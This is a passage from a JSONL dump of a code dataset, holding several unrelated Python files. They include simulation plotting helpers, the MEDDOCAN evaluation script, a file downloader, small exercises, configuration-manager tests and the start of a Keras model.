master_info\r\n\r\ndef get_machines_jobs_list(machines_jobs_list_flat, machines_jobs_list_sizes):\r\n\tmachines_jobs_list = [[] for _ in range(len(machines_jobs_list_sizes))]\r\n\tm_i = 0\r\n\tct0 = 0\r\n\tfor i in range(len(machines_jobs_list_flat)):\r\n\t\tmachines_jobs_list[m_i].append(machines_jobs_list_flat[i])\r\n\t\tct0 += 1\r\n\t\tif ct0 == machines_jobs_list_sizes[m_i]:\r\n\t\t\tm_i += 1\r\n\t\t\tct0 = 0\r\n\treturn machines_jobs_list\r\n\r\ndef get_worker_info_from_machines_jobs_list(n,k,machines_jobs_list, rank):\r\n\r\n\tjob_number_worker = -1\r\n\tlocal_master_rank = -1\r\n\tlocal_process_rank_list = []\r\n\r\n\tct_rank = 0\r\n\tct_master_rank = 0\r\n\tfor n_i in range(n):\r\n\t\tfor job_number in machines_jobs_list[n_i]:\r\n\t\t\tif rank == ct_rank:\r\n\t\t\t\tjob_number_worker = job_number\r\n\t\t\t\tlocal_master_rank = ct_master_rank\r\n\t\t\t\tlocal_process_rank_list = [(local_master_rank + i2) for i2 in range(len(machines_jobs_list[n_i]))]\r\n\t\t\tct_rank +=1\r\n\t\tct_master_rank += len(machines_jobs_list[n_i])\r\n\t\r\n\treturn job_number_worker, local_master_rank, local_process_rank_list\r\n\r\n\r\n\r\ndef just_get_machine_failed_list(n, eps):\r\n\tmachine_failed_list = []\r\n\tfor i in range(n):\r\n\t\tif eps > np.random.random():\r\n\t\t\tmachine_failed_list.append(i)\r\n\t\telse:\r\n\t\t\tpass\r\n\treturn machine_failed_list\r\n\r\ndef save_suc_Tss_list(k, ns, suc_Tss):\r\n\tcsv_file = open(\"suc_Tss_list.csv\", \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\r\n\tfor i in range(len(ns)):\r\n\t\trow = [str(int(k)), str(int(ns[i]))]\r\n\t\trow.extend([ str(suc_T) for suc_T in suc_Tss[i]] )\r\n\t\tcw.writerow(row)\r\n\tcsv_file.close()\r\n\r\ndef save_success_rate_list_sim(ns, success_rates, eps):\r\n\tcsv_file = open(\"success_rate_list_eps%f.csv\" % eps, \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\r\n\tfor i in range(len(ns)):\r\n\t\tcw.writerow([str(ns[i]), str(success_rates[i])])\r\n\tcsv_file.close()\r\n\r\ndef plotting(k, ns, Ts, success_rates_Ts):\r\n\tndivk = [ns[i]/float(k) for i in range(len(ns))]\r\n\t# print \"n/k\", ndivk\r\n\t# ndivk = [1.0, 1.2, 1.4]\r\n\t# success_rates_Ts = [[0.2, 0.6, 0.8], [0.9, 0.95, 1.0]]\r\n\t\r\n\tfor i in range(len(Ts)):\r\n\t\tplt.plot(ndivk, success_rates_Ts[i], label='T=%.2f'% Ts[i])\r\n\t\r\n\tplt.title('LDGM Success Rate for k=%d' % k)\r\n\tplt.xlabel('Ratio of machines to jobs (n/k)')\r\n\tplt.ylabel('Success Rate')\r\n\tplt.legend(loc = 4)\r\n\t# plt.show()\r\n\tplt.savefig('f_cluster.png')\r\n\r\n\r\ndef plotting_sim(k, ns, epss, success_rates_epss):\r\n\tndivk = [ns[i]/float(k) for i in range(len(ns))]\r\n\t# print \"n/k\", ndivk\r\n\t\r\n\t# ndivk = [1.0, 1.2, 1.4]\r\n\t# success_rates_Ts = [[0.2, 0.6, 0.8], [0.9, 0.95, 1.0]]\r\n\t\r\n\r\n\tfor i in range(len(epss)):\r\n\t\tplt.plot(ndivk, success_rates_epss[i], label='eps=%f'% epss[i])\r\n\t\r\n\tplt.title('LDGM Success Rate (sim) for k=%d' % k)\r\n\tplt.xlabel('Ratio of machines to jobs (n/k)')\r\n\tplt.ylabel('Success Rate')\r\n\tplt.legend(loc = 4)\r\n\t# plt.show()\r\n\tplt.savefig('f_sim.png')\r\n\r\n\r\ndef save_arrival_time_list(arrival_time, n):\r\n\tcsv_file = open(\"arrival_time_n%d.csv\"%n, \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\tfor i in range(len(arrival_time)):\r\n\t\tcw.writerow([str(arrival_time[i])])\r\n\tcsv_file.close()\r\n\r\ndef plot_histogram(suc_Ts, n, k):\r\n\tplt.hist(suc_Ts, bins=10, color= 'b')\r\n\tplt.title('Success T for k=%d, n=%d' % (k,n))\r\n\tplt.xlabel('T')\r\n\tplt.ylabel('count')\r\n\t# plt.show()\r\n\tplt.savefig('f_T_k=%d, n=%d.png' % (k,n))","sub_path":"Actual_jc_T/graph_subroutines.py","file_name":"graph_subroutines.py","file_ext":"py","file_size_in_byte":9616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"569789633","text":"# coding=utf-8\n###############################################################################\n#\n# Copyright 2019 Secretaría de Estado para el Avance Digital (SEAD)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# MEDDOCAN Evaluation Script\n#\n# This script is distributed as apart of the Medical Document Anonymization\n# (MEDDOCAN) task. It is inspired on the evaluation script from the i2b2\n# 2014 Cardiac Risk and Personal Health-care Information (PHI) tasks. It is\n# intended to be used via command line:\n#\n# $> python evaluate.py [i2b2|brat] [ner|spans] GOLD SYSTEM\n#\n# It produces Precision, Recall and F1 (P/R/F1) and leak score measures for\n# the NER subtrack and P/R/F1 for the SPAN subtrack. The latter includes a\n# relaxed metric where the spans are merged if only non-alphanumerical\n# characters are found between them.\n#\n# SYSTEM and GOLD may be individual files or also directories in which case\n# all files in SYSTEM will be compared to files the GOLD directory based on\n# their file names.\n#\n# Basic Examples:\n#\n# $> python evaluate.py i2b2 ner gold/01.xml system/run1/01.xml\n#\n# Evaluate the single system output file '01.xml' against the gold standard\n# file '01.xml' NER subtrack. Input files in i2b2 format.\n#\n# $> python evaluate.py brat ner gold/01.ann system/run1/01.ann\n#\n# Evaluate the single system output file '01.ann' against the gold standard\n# file '01.ann' NER subtrack. Input files in BRAT format.\n#\n# $> python evaluate.py i2b2 spans gold/ system/run1/\n#\n# Evaluate the set of system outputs in the folder system/run1 against the\n# set of gold standard annotations in gold/ using the SPANS subtrack. Input\n# files in i2b2 format.\n#\n# $> python evaluate.py brat ner gold/ system/run1/ system/run2/ system/run3/\n#\n# Evaluate the set of system outputs in the folder system/run1, system/run2\n# and in the folder system/run3 against the set of gold standard annotations\n# in gold/ using the NER subtrack. Input files in BRAT format.\nimport os\nimport argparse\nfrom classes import i2b2Annotation, BratAnnotation, NER_Evaluation, Span_Evaluation\nfrom collections import defaultdict\n\n\ndef get_document_dict_by_system_id(system_dirs, annotation_format):\n \"\"\"Takes a list of directories and returns annotations. \"\"\"\n\n documents = defaultdict(lambda: defaultdict(int))\n\n for d in system_dirs:\n for fn in os.listdir(d):\n if fn.endswith(\".ann\") or fn.endswith(\".xml\"):\n sa = annotation_format(os.path.join(d, fn))\n documents[sa.sys_id][sa.id] = sa\n\n return documents\n\n\ndef evaluate(gs, system, annotation_format, subtrack, **kwargs):\n \"\"\"Evaluate the system by calling either NER_evaluation or Span_Evaluation.\n 'system' can be a list containing either one file, or one or more\n directories. 'gs' can be a file or a directory. \"\"\"\n\n gold_ann = {}\n evaluations = []\n\n # Strip verbose keyword if it exists\n try:\n verbose = kwargs['verbose']\n del kwargs['verbose']\n except KeyError:\n verbose = False\n\n # Handle if two files were passed on the command line\n if os.path.isfile(system[0]) and os.path.isfile(gs):\n if (system[0].endswith(\".ann\") and gs.endswith(\".ann\")) or \\\n (system[0].endswith(\".xml\") or gs.endswith(\".xml\")):\n gs = annotation_format(gs)\n sys = annotation_format(system[0])\n e = subtrack({sys.id: sys}, {gs.id: gs}, **kwargs)\n e.print_docs()\n evaluations.append(e)\n\n # Handle the case where 'gs' is a directory and 'system' is a list of directories.\n elif all([os.path.isdir(sys) for sys in system]) and os.path.isdir(gs):\n # Get a dict of gold annotations indexed by id\n\n for filename in os.listdir(gs):\n if filename.endswith(\".ann\") or filename.endswith(\".xml\"):\n annotations = annotation_format(os.path.join(gs, filename))\n gold_ann[annotations.id] = annotations\n\n for system_id, system_ann in sorted(get_document_dict_by_system_id(system, annotation_format).items()):\n e = subtrack(system_ann, gold_ann, **kwargs)\n e.print_report(verbose=verbose)\n evaluations.append(e)\n\n else:\n Exception(\"Must pass file file or [directory/]+ directory/\"\n \"on command line!\")\n\n return evaluations[0] if len(evaluations) == 1 else evaluations\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Evaluation script for the MEDDOCAN track.\")\n\n parser.add_argument(\"format\",\n choices=[\"i2b2\", \"brat\"],\n help=\"Format\")\n parser.add_argument(\"subtrack\",\n choices=[\"ner\", \"spans\"],\n help=\"Subtrack\")\n parser.add_argument('-v', '--verbose',\n help=\"List also scores for each document\",\n action=\"store_true\")\n parser.add_argument(\"gs_dir\",\n help=\"Directory to load GS from\")\n parser.add_argument(\"sys_dir\",\n help=\"Directories with system outputs (one or more)\",\n nargs=\"+\")\n\n args = parser.parse_args()\n\n evaluate(args.gs_dir,\n args.sys_dir,\n i2b2Annotation if args.format == \"i2b2\" else BratAnnotation,\n NER_Evaluation if args.subtrack == \"ner\" else Span_Evaluation,\n verbose=args.verbose)\n","sub_path":"finalSubmission/code/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"278676799","text":"s=''\r\nfor i in open('names.txt'):\r\n s=i\r\n print(s)\r\ns=s.replace('\"','').split(\",\")\r\nprint(type(s))\r\nprint(s)\r\nprint(len(s))\r\ns=sorted(s)\r\nprint(s)\r\ndef run(x):\r\n lst=[]\r\n for i in x.lower():\r\n lst.append(ord(i)-96)\r\n #print(lst)\r\n return sum(lst)\r\n#str=''\r\ni=1\r\ny=0\r\nfor each in range(0,len(s)):\r\n y+=run(s[each])*i\r\n i+=1\r\nprint(y)\r\n#print(str)\r\n#print(run(str))\r\n#str+=s[each]\r\n","sub_path":"class_4_1.py","file_name":"class_4_1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"27922652","text":"from tqdm import tqdm\nimport requests\nimport os\nimport json\nimport sys\n\nDOWNLOAD_FILE = \"./downloader/\"\nos.makedirs(DOWNLOAD_FILE, exist_ok=True)\nprint(sys.argv[1])\nwith open(sys.argv[1]) as file:\n download_list = json.load(file)\ni = 1\nfor download_item in download_list:\n res = requests.get(download_item.get('download_link'), stream=True)\n total_size = int(res.headers['content-length'])\n filename = \"{}{}\".format(DOWNLOAD_FILE, download_item.get('title'), download_item.get('download_link').split(\".\")[-1])\n\n total_kb = total_size / 1024\n total_mb = total_size / (1024 * 1024)\n\n unit = \"MB\" if total_mb >= 1 else \"KB\"\n total = total_mb if total_mb >= 1 else total_kb\n chunk_size = (1024 * 1024) if total_mb >= 1 else 1024\n\n with open(filename, \"wb\") as f:\n for data in tqdm(iterable=res.iter_content(chunk_size=chunk_size), total=total, unit=unit):\n f.write(data)\n print(\"file %s completed !\" % i)\n i += 1\n\nprint(\">>>>>> All downloads completed ! <<<<<<\")","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"167937924","text":"#!/Users/Jonman/anaconda/bin/python3\nimport asyncio as snc\n\n\nasync def compute(x, y):\n print( \"Compute {} + {}...\".format( x, y))\n await snc.sleep( 10)\n return x + y\n \n \nasync def print_sum(x, y):\n result = await compute( x, y)\n print( \"{} + {} = {}\".format( x, y, result))\n \n \nloop = snc.get_event_loop() # Get the event loop of the current context\nloop.run_until_complete( print_sum( 2, 4)) # Blocking call that returns what the print_sum() coroutine is done\nloop.close()\n","sub_path":"asyncio/coroutine_chaining.py","file_name":"coroutine_chaining.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"496601067","text":"import random # import random library\n\n# get input from the user\nprint(\"Welcome to 'roll the dice'\")\ni = int(input(\"\\nEnter the maximum value of Dice: \"))\n\nwant = \"y\" \n\nwhile want == \"y\":\n print(random.randrange(1, i+1, 1))\n want = input(\"Do you want to roll the dice again (y/n): \")\n\nprint(\"\\nThank you for rolling the dice\")\n\n","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14856536","text":"'''\n数据预处理\n'''\nimport os\n\nimport pandas as pd\nimport torch\n\n''' 读取数据集 '''\nos.makedirs(os.path.join('.', 'data'), exist_ok=True) # os.path.join:路径拼接\ndata_file = os.path.join('.', 'data', 'house_tiny.csv')\nwith open(data_file, 'w') as f:\n f.write('NumRooms,Alley,Price\\n') # 列名\n f.write('NA,Pave,127500\\n') # 每行表示一个数据样本\n f.write('2,NA,106000\\n')\n f.write('4,NA,178100\\n')\n f.write('NA,NA,140000\\n')\n\ndata = pd.read_csv(data_file)\nprint(data)\n\n''' 处理缺失值 插值与删除'''\ninputs, outputs = data.iloc[:, 0:2], data.iloc[:, 2]\ninputs = inputs.fillna(inputs.mean())\nprint(inputs)\n\ninputs = pd.get_dummies(inputs, dummy_na=True)\nprint(inputs)\n\n''' 转换为张量格式 '''\nX, y = torch.tensor(inputs.values), torch.tensor(outputs.values)\nprint(X, y)\n","sub_path":"d2l/c1_foundation/prep_pandas.py","file_name":"prep_pandas.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"322348620","text":"#Acceleration Status of Health\r\nimport time\r\nimport datetime\r\nimport board\r\nimport busio\r\nimport json\r\nfrom uuid import getnode as get_mac\r\nimport uuid\r\nfrom collections import OrderedDict\r\nimport os\r\nfrom datetime import datetime\r\nimport socket\r\nimport sys\r\nfrom influxdb import InfluxDBClient\r\n\r\n# Configure InfluxDB connection variables\r\nhost = \"34.227.68.135\" # AWS EC2 Instance_ID i-0610264e5f0651062\r\nport = 8086 # default port\r\nuser = \"rpi\" # the user/password created for the pi, with write access\r\npassword = \"4DAF966B44\"\r\ndbname = \"OSNDS\" # the database we created earlier\r\n\r\n# Create the InfluxDB client object\r\nclient = InfluxDBClient(host, port, user, password, dbname)\r\n\r\n#Imports the Accelerometer Sensor (lsm9ds1)\r\nimport adafruit_lsm9ds1\r\n\r\n# Initialize the I2C bus.\r\ni2c = busio.I2C(board.SCL, board.SDA)\r\n\r\n#Initializes global variables\r\nglobal accelerationSensor\r\nglobal startTime\r\n\r\n#Method to initialize all sensors using the global variables\r\ndef initializeSensors():\r\n #Initialize the Acceleration Sensor (lsm9ds1)\r\n global accelerationSensor\r\n global startTime\r\n startTime = int(round(time.time() * 1000))\r\n try:\r\n accelerationSensor = adafruit_lsm9ds1.LSM9DS1_I2C(i2c)\r\n except(OSError, ValueError):\r\n print(\"Acceleration sensor not detected\")\r\n\r\ndef getJSON3(value, data_type, label):\r\n sampleUUID = str(uuid.uuid1())\r\n jsonFormat =[\r\n {\r\n \"measurement\": data_type,\r\n \"tags\": {\r\n \"UNIT_ID\": socket.gethostname(),\r\n \"SAMPLE_ID\": sampleUUID,\r\n },\r\n \"time\": value[3],\r\n \"fields\": {\r\n label+\"x\" : value[0],\r\n\t\t label+\"y\" : value[1],\r\n\t\t label+\"z\" : value[2],\r\n }\r\n }\r\n ]\r\n\r\n print(jsonFormat)\r\n # Send the JSON data to InfluxDB\r\n client.write_points(jsonFormat)\r\n return str(jsonFormat)\r\n\r\n#Method to get Acceleration (LSM9DS1)\r\ndef getAcceleration():\r\n accelerationArray = []\r\n accel_x, accel_y, accel_z = accelerationSensor.acceleration\r\n accelerationArray.append(accel_x)\r\n accelerationArray.append(accel_y)\r\n accelerationArray.append(accel_z)\r\n accelerationArray.append(time.ctime())\r\n return accelerationArray\r\n\r\n#Saves data to local storage\r\ndef saveToFile(msg):\r\n fileName = time.strftime(\"%d-%m-%Y\", time.localtime()) + \"_data.txt\"\r\n f = open(fileName, \"a+\")\r\n f.write(msg)\r\n f.write(\"\\n\")\r\n f.close()\r\n\r\n#Method that begins collecting data \r\ndef runAllSensors():\r\n #global startTime\r\n #Poll rates in counts per second\r\n #accelerationPollRate = 1\r\n timing1 =datetime.now()\r\n counter = 0\r\n while True:\r\n #Initializes the time\r\n #ctime = int(round(time.time() * 1000))\r\n #Gets acceleration data at correct poll rate\r\n #if(ctime >= startTime):\r\n try:\r\n msg = getJSON3(getAcceleration(), \"acceleration\", \"M/S^2\")\r\n saveToFile(msg)\r\n timing2 = datetime.now()\r\n runtime = timing2 - timing1\r\n print(\"TOTAL RUNTIME IS \", runtime)\r\n print(\"counter = \", counter)\r\n counter+=1\r\n #startTime += accelerationPollRate\r\n except(OSError, ValueError):\r\n print(\"Acceleration sensor not detected\")\r\n\r\ninitializeSensors()\r\nrunAllSensors()\r\n","sub_path":"SeperateSensors/accelerationHighResolutionFAST.py","file_name":"accelerationHighResolutionFAST.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158760869","text":"\n\ndef build_word_cloud(words):\n # Use a dictionary because we need to store a key and value.\n cloud = {}\n ignore = [',', '.', '\\'', '\"', ':', ';', '!',\n '@', '#', '$', '%', '^', '&', '*', '(', ')']\n\n # Default is to split on whitespace.\n # O(n) where n is the length of the string.\n tokens = words.split()\n for token in tokens:\n token = token.lower()\n\n first = token[0]\n if first in ignore:\n token = token[1:]\n\n last = token[-1]\n if last in ignore:\n token = token[:-1]\n\n if token not in cloud:\n cloud[token] = 0\n cloud[token] += 1\n\n return cloud\n\n\ndef build_word_cloud2(words):\n # Use a dictionary because we need to store a key and value.\n cloud = {}\n word = ''\n\n for char in words:\n if char == ' ':\n if word not in cloud:\n cloud[word] = 0\n cloud[word] += 1\n # Start a new word.\n word = ''\n continue\n\n if char.isalpha():\n word += char.lower()\n\n return cloud\n\n\nif __name__ == \"__main__\":\n cloud = build_word_cloud2(\n 'After beating the eggs, Dana read the next step: Add milk and eggs, then add flour and sugar.')\n print(cloud)\n cloud = build_word_cloud(\n 'After beating the eggs, Dana read the next step: Add milk and eggs, then add flour and sugar.')\n print(cloud)\n","sub_path":"cake/word-cloud/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"483468089","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'58tongcheng'\n\n_author_='wangjianfeng'\n\nfrom multiprocessing import Pool\nfrom channel_extract_mine import channel_list\nfrom pages_parsing_mine import get_links_from\n\ndef get_all_links_from(channel):\n for i in range(1,100):\n get_links_from(channel,i)\n\nif __name__=='__main__':\n pool=Pool()\n pool.map(get_all_links_from,channel_list.split())","sub_path":"Week_2/2_2/2_2code_of_video/58_mine/main_mine.py","file_name":"main_mine.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547198566","text":"# python Math question generator\r\nimport random\r\n# ask user for question type\r\nquestionType = input(\"What type of question would you like? +, -, * or /? \")\r\n\r\ndef q(qt):\r\n global ans\r\n global num1\r\n global num2\r\n global score\r\n global userAns\r\n score = 0\r\n if qt == \"+\":\r\n #addition\r\n print(\"You Selected addition!\")\r\n num1 = random.randint(-99,99)\r\n num2 = random.randint(-99,99)\r\n ans = num1 + num2\r\n userAns = input(\"Whats is \"+ str(num1) +\" + \"+ str(num2) +\"? \")\r\n userAns = int(userAns)\r\n if userAns == ans:\r\n print(\"You are right!\")\r\n score += 1\r\n else:\r\n print(\"You are wrong!\")\r\n print(\"The correct answer was: \", ans)\r\n elif qt == \"-\":\r\n #subtraction\r\n print(\"You Selected subtraction!\")\r\n num1 = random.randint(-99,99)\r\n num2 = random.randint(-99,99)\r\n ans = num1 - num2\r\n userAns = input(\"Whats is \"+ str(num1) +\" - \"+ str(num2) +\"? \")\r\n userAns = int(userAns)\r\n if userAns == ans:\r\n print(\"You are right!\")\r\n score += 1\r\n else:\r\n print(\"You are wrong!\")\r\n print(\"The correct answer was: \", ans)\r\n elif qt == \"*\":\r\n #multiplication\r\n print(\"You Selected multiplication!\")\r\n num1 = random.randint(-99,99)\r\n num2 = random.randint(-99,99)\r\n ans = num1 * num2\r\n userAns = input(\"Whats is \"+ str(num1) +\" * \"+ str(num2) +\"? \")\r\n userAns = int(userAns)\r\n if userAns == ans:\r\n print(\"You are right!\")\r\n score += 1\r\n else:\r\n print(\"You are wrong!\")\r\n print(\"The correct answer was: \", ans)\r\n elif qt == \"/\":\r\n #division\r\n print(\"Your answer will be rounded to the nearest tenth\")\r\n print(\"You Selected division!\")\r\n num1 = random.randint(-99,99)\r\n num2 = random.randint(-99,99)\r\n ans = num1 / num2\r\n userAns = input(\"Whats is \"+ str(num1) +\" / \"+ str(num2) +\"? \")\r\n userAns = float(userAns)\r\n ans = round(ans,1)\r\n if userAns == ans:\r\n print(\"You are right!\")\r\n score += 1\r\n else:\r\n print(\"You are wrong!\")\r\n print(\"The correct answer was: \", ans)\r\n else:\r\n print(\"Please enter a valid operation, such as +, -, * and /\")\r\n qt = input(\"What type of question would you like? +, -, * or /? \")\r\n q(qt)\r\ndef again():\r\n #ask user if they wanna play again\r\n question = input(\"Would you like to play again? Y/N \")\r\n question = question.upper()\r\n if question == \"Y\":\r\n questionType = input(\"What type of question would you like? +, -, * or /? \")\r\n #wrap functions around\r\n q(questionType)\r\n again()\r\n return\r\n else:\r\n print(\"Hope you enjoyed your stay!\")\r\n return\r\nq(questionType) \r\nagain()\r\n\r\n","sub_path":"math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"614620124","text":"import unittest\nimport mock\nfrom shipshift.libs.ConfigurationManager import ConfigurationManager\n\n\nclass TestConfigurationManager(unittest.TestCase):\n def setUp(self):\n self.cm = ConfigurationManager('tests/files/cm_test.yaml')\n\n def tearDown(self):\n pass\n\n def test_configuration_file_loaded(self):\n self.assertNotEqual(self.cm._get_config(), {})\n\n def test_cannot_overwrite_configurations(self):\n self.cm = ConfigurationManager()\n self.assertNotEqual(self.cm._get_config(), {})\n\n old_config = self.cm._get_config()\n self.cm = ConfigurationManager('blabla/not_exists.yaml')\n self.assertEqual(old_config, self.cm._get_config())\n\n def test_get_artifact(self):\n expected = [\n {\n 'name': '.+\\\\.log',\n 'tags': ['log-file']\n },\n {\n 'name': '^test-results.xml',\n 'tags': ['test-results', 'xml-file']\n }\n ]\n self.assertEqual(self.cm.get_artifact(), expected)\n\n def test_get_jenkins(self):\n expected = [\n {\n 'zmq': 'tcp://jenkins1.shipshift.io:8888',\n 'url': 'https://jenkins1.shipshift.io'\n },\n {\n 'zmq': 'udp://jenkins2.shipshift.io:8899',\n 'url': 'http://jenkins2.shipshift.io:8080'\n }\n ]\n self.assertEqual(self.cm.get_jenkins(), expected)\n\n def test_get_path_default_value(self):\n self.assertEqual(self.cm.get_path(), '/var/www/html')\n\n @mock.patch.object(ConfigurationManager, '_get_config')\n def test_get_path(self, _mock_get_config):\n my_path = '/usr/share/nginx/html'\n _mock_get_config.return_value = {'path': my_path}\n self.assertEqual(self.cm.get_path(), my_path)\n\n def test_get_url_default_value(self):\n self.assertEqual(self.cm.get_url(), 'http://localhost')\n\n @mock.patch.object(ConfigurationManager, '_get_config')\n def test_get_url(self, _mock_get_config):\n my_url = 'http://172.17.0.1:82'\n _mock_get_config.return_value = {'url': my_url}\n self.assertEqual(self.cm.get_url(), my_url)\n\n def test_get_gearman(self):\n server, port = self.cm.get_gearman()\n self.assertEqual(server, 'logs.myhost.io')\n self.assertEqual(port, 9911)\n\n def test_get_output(self):\n outputs = self.cm.get_output()\n expected = {\n 'protocol': 'redis',\n 'server': 'redis.myhost.io',\n 'port': 6379\n }\n self.assertEqual(outputs, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_configuration_manager.py","file_name":"test_configuration_manager.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286943917","text":"print(\"Forgot what gift was given on one of the last five days of Christmas?\") #Title and purpose of program\r\nprint(\"Enter a number between 1 and 5:\")\r\n\r\nnum1 = int(input())\r\n \r\n#This loop allows for people to type the wrong number and still have a chance to put the right number in.\r\ninvalid_input = 1\r\nwhile invalid_input == 1:\r\n if num1 == 1:\r\n print(\"1 partridge in a pear tree.\")\r\n invalid_input = 0\r\n elif num1 == 2:\r\n print(\"2 turtle doves\")\r\n invalid_input = 0\r\n elif num1 == 3:\r\n print(\"3 French hens\")\r\n invalid_input = 0\r\n elif num1 == 4:\r\n print(\"4 calling birds\")\r\n invalid_input = 0\r\n elif num1 == 5:\r\n print(\"5 golden rings\")\r\n invalid_input = 0\r\n else:\r\n print(\"Please enter a NUMBER BETWEEN 1 and 5\")\r\n num1 = int(input())\r\n invalid_input = 1\r\n\r\n","sub_path":"Python 1/Lab 2 Part 1.py","file_name":"Lab 2 Part 1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"529302064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 10:23:48 2019\n\n@author: nina\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 01:08:44 2019\n\n@author: nina\n\"\"\"\n\nfrom IPython.display import display\nimport sympy\nfrom sympy import Function, sqrt, dsolve, Eq, Derivative\nfrom sympy import solve, Poly, Eq, Function, exp\nfrom sympy import Indexed, IndexedBase, Tuple, sqrt\n\n\nt = sympy.Symbol('t')\nd=0\no=0.5\nro00=Function('ro00')(t)\nro01=Function('ro01')(t)\nro10=Function('ro10')(t)\nro11=Function('ro11')(t)\nI = sympy.Symbol('I')\n\neq1 = Eq(Derivative(ro00,t), ro11 - I*(o*ro01/2 - o*ro10/2))\neq2 = Eq(Derivative(ro01,t), -ro01 - I*(-d*ro01 + o*ro00/2 - o*ro11/2))\neq3 = Eq(Derivative(ro10,t),-ro10 - I*(d*ro10 - o*ro00/2 + o*ro11/2))\neq4 = Eq(Derivative(ro11,t), -ro11 - I*(-o*ro01/2 + o*ro10/2))\n\n\"resenje je sa konstantama C1, C2 i C3\"\nsoln = dsolve((eq1, eq2, eq3, eq4))\ndisplay(soln)\nprint(soln)","sub_path":"resavanjeDifJna.py","file_name":"resavanjeDifJna.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605235023","text":"import data_generator as dg # Creates a random list of int between -5 and 10. \ndata = dg.data_set # Assigns the list of random int to a variable data\n\n# from earlier\ndata_sum = 0\nfor num in data:\n # could also yuse `data_sum = data_sum + num`\n data_sum += num\n# this is the mean\naverage = data_sum/len(data)\n\n\nsum_squared_diff = 0\nfor num in data:\n # now calc the sum of (each number minus the mean)^2\n squared_diff = (num - average)**2\n sum_squared_diff += squared_diff\n# then, divide by len() to get the sum of mean squared \nmean_squared_diff = sum_squared_diff/len(data)\nsd = mean_squared_diff**.5\n\nprint(f'The standard deviation of your data is {sd}')\n","sub_path":"P1P1/4_stddev.py","file_name":"4_stddev.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"90705864","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 18 17:24:44 2019\n\n@author: kokis\n\"\"\"\n\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.layers.core import RepeatVector\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\n \nnp.random.seed()\n\ndef n(digits=3):\n number=''\n for i in range(np.random.randint(1,digits+1)):\n number+=np.random.choice(list('0123456789'))\n \n return int(number)\n\ndef padding(chars,maxlen):\n return chars+' 